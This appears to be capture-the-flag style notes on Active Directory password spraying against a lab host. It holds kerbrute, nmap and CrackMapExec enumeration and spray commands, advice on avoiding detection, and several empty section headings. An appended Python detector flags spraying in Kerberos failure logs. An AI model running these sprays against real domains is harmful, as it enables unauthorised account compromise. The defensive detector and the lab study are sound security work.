5. Password Spraying Overview
1. User Enumeration with Kerbrute
# Using a predefined username list
kerbrute userenum --dc <domain-controller> -d <domain> usernames.txt
# Using a generated username list (GUIDs example)
for x in {{A..Z},{0..9}}{{A..Z},{0..9}}{{A..Z},{0..9}}{{A..Z},{0..9}}; do echo $x; done > usernames.txt
# Alternative: enumerate users over Kerberos (port 88) with the nmap krb5-enum-users script
nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm=frizz.htb 10.10.11.60
2. Password Spraying with Kerbrute
kerbrute passwordspray --dc <domain-controller> -d <domain> -U usernames.txt -p <common-password>
3. Password Spraying with CrackMapExec (CME)
cme smb <target-ip> -u usernames.txt -p <password> --no-bruteforce
4. Obtaining Password Policy (if internal access is available)
net accounts
Get-ADDefaultDomainPasswordPolicy
5. Delay Consideration Between Sprays (Bash Example)
6. Handling Large User Lists (Bash Example)
7. Post-Spray Enumeration
8. Automation (Basic Script)
Notes:
- Adjust delay times based on password policy.
- Always confirm the password policy before attempting spraying.
- Use minimal attempts to avoid detection and lockouts.
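The lockout threshold from section 4 is why a spray keeps per-account attempts low, and the flip side for a defender is that per-account lockout never fires, so detection has to correlate failures across many accounts from one source. Added example, not part of these notes: a Python detector run over constructed log lines modelled on Windows Security event 4771 (Kerberos pre-authentication failed); the field layout, addresses, thresholds and window are assumptions for this example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines modelled on event 4771; the field layout is assumed.
# 10.0.0.50 fails once against five different accounts (spray pattern),
# 10.0.0.77 fails three times against one account (classic brute force).
SAMPLE_LOG = """\
2024-05-01T09:00:01 EventID=4771 TargetUserName=alice ClientAddress=10.0.0.50 Status=0x18
2024-05-01T09:00:02 EventID=4771 TargetUserName=bob ClientAddress=10.0.0.50 Status=0x18
2024-05-01T09:00:03 EventID=4771 TargetUserName=carol ClientAddress=10.0.0.50 Status=0x18
2024-05-01T09:00:04 EventID=4771 TargetUserName=dave ClientAddress=10.0.0.50 Status=0x18
2024-05-01T09:00:05 EventID=4771 TargetUserName=erin ClientAddress=10.0.0.50 Status=0x18
2024-05-01T09:10:00 EventID=4771 TargetUserName=alice ClientAddress=10.0.0.77 Status=0x18
2024-05-01T09:10:01 EventID=4771 TargetUserName=alice ClientAddress=10.0.0.77 Status=0x18
2024-05-01T09:10:02 EventID=4771 TargetUserName=alice ClientAddress=10.0.0.77 Status=0x18
2024-05-01T11:00:00 EventID=4771 TargetUserName=grace ClientAddress=10.0.0.50 Status=0x18
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) EventID=4771 TargetUserName=(?P<user>\S+) "
    r"ClientAddress=(?P<src>\S+) Status=(?P<status>\S+)$"
)

def parse_failures(text):
    """Yield (timestamp, user, source) per 4771 line; status 0x18 means bad password."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m and m.group("status") == "0x18":
            yield datetime.fromisoformat(m.group("ts")), m.group("user").lower(), m.group("src")

def detect_spray(text, window=timedelta(minutes=5), min_accounts=5, lockout_threshold=5):
    """Flag sources failing against >= min_accounts distinct users inside one window
    while each account stays below lockout_threshold (the spray signature).
    Returns {source: sorted user names}; single-account brute force is not reported."""
    by_src = defaultdict(list)
    for ts, user, src in parse_failures(text):
        by_src[src].append((ts, user))
    hits = {}
    for src, events in by_src.items():
        events.sort()
        for i, (start, _) in enumerate(events):
            per_user = defaultdict(int)
            for t, u in events[i:]:
                if t - start <= window:
                    per_user[u] += 1
            if len(per_user) >= min_accounts and max(per_user.values()) < lockout_threshold:
                hits[src] = sorted(per_user)
                break
    return hits

if __name__ == "__main__":
    print(detect_spray(SAMPLE_LOG))
```

Tune `window` and `min_accounts` to the observation window and lockout threshold reported by `net accounts`, since a spray that respects the policy will sit just under them.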